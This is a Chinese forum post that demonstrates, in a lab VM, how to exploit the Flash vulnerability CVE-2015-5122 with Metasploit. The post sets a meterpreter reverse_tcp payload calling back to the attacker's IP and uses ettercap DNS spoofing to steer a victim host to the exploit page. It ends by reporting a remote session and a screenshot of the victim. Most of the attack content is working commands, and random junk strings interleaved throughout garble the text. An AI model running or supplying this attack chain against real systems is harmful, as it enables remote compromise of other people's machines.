找回密码
 立即注册
查看: 2541|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ X4 n$ m4 E: i+ d 二、cve2015-5122漏洞实例演示虚拟机 7 [, a% i. L7 c3 B

. ^+ C& e5 k5 }3 |9 R% r

4 p* ~- {8 U1 ?$ |( E6 H# q   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 4 k0 k7 F( K4 @9 @0 s

# E2 ^, x* c' s

; t! |7 O5 j- w* T3 o) m+ S search cve-2015-5122如图: - ?3 H2 [/ D+ U+ H

) g T, H) T& U0 X, ^

1 c% h; S$ r1 Y+ ^: F1 E$ L   & i! A; b; N& r t3 [7 Q( O: R) I

2 N+ J9 \: X! o( l

: A, ]4 o% e" N8 R* ^2 s l 下面我们敲如下命令: , f9 d F7 ~ k. \; L

6 h+ s* j( u2 h4 X" q

& L- j( E: t2 s# X use exploit/multi/browser/adobe_flash_opaque_background_uaf 8 g2 }0 b, K1 f3 _$ Z

& s8 ~) {, e% @9 A1 L* |# C6 ^" P

5 ~4 B [/ k7 u5 r! r: o: I5 \ set PAYLOAD windows/meterpreter/reverse_tcp P; t7 E2 h% Y$ q; b

6 s' }/ u& d- J: z ~. r. v' M& @

9 o0 c, d( [; r2 E set LHOST 192.168.0.109 . s5 x- Z5 c2 t9 f. T& s4 P8 G

" v/ e& j# n! T# R

6 y0 s# [. K& K2 { set URIPATH /                        /*根目录*/ - V9 F# [2 u% C$ r/ ~) o7 @. I

# ~( S- D" z2 S5 i3 t* X0 \

$ N R6 \+ s/ l/ e6 t set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 4 v/ h* S+ m# S8 o$ ]! p

2 {) h: T* z* o z/ P' a3 y

T6 z; A- ~- P# G set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 4 _, ^0 o2 }* t1 ]; J- l

1 ^) e( i9 x$ e7 {" n4 c5 y

+ B) O/ L( x4 F: x 然后show options如图: ) Q5 Z- v! d1 S: {- S0 B( H

) u: v7 Q( ^4 A Y, J

/ Q' j- ? |- P- k: H2 |4 \   ! l" V; y- w4 s, A8 `, U

2 O; j M9 X) O! V- H/ K4 D8 z9 B8 B

6 b* J# A2 s- b& U/ u: e 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
5 c5 j6 b) e: d: [
( b& U( b" L9 m. i0 j: D1 ]

5 X/ G% F8 m: b/ D) ^

c6 G/ d1 h9 J9 U H- |) a 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 * A2 |9 e H! o% N

( M% |- T, I3 x

p, P" l8 V9 f R( X+ K Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf - a5 P. |* Y5 R+ ] \

+ l o5 Z* `/ P$ Z

2 O) r5 G7 |+ b9 ^5 m6 j2 i8 I   . ~; l2 v0 E& Y

$ G9 R: w' f' y8 e5 b, w

/ j/ s& ~+ @0 h$ x! Q! y9 O8 u 成功了,这时候我们断开ettercap,如图: , G2 y# F7 n+ a2 d; f/ j

; d2 r0 L9 N' w2 ~

4 `. x/ z: p$ \( Y; [   + p6 a! k" W0 C% U* y

. A+ ]4 y. X( T/ r2 q

8 {1 D! }2 E' ^, g+ ^8 [ Screenshot如图: ) X5 _. ^& b; X

* A5 U: O* G/ t# g) J- l

8 c" T( U# r6 _* B( [) h   / i2 P5 X2 S Z# i; d+ Y) F

K5 r& l3 A. D% g V: Q

% C/ \' t# _' j: }, x ! g3 }( Z" n# a+ ?9 p" N

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表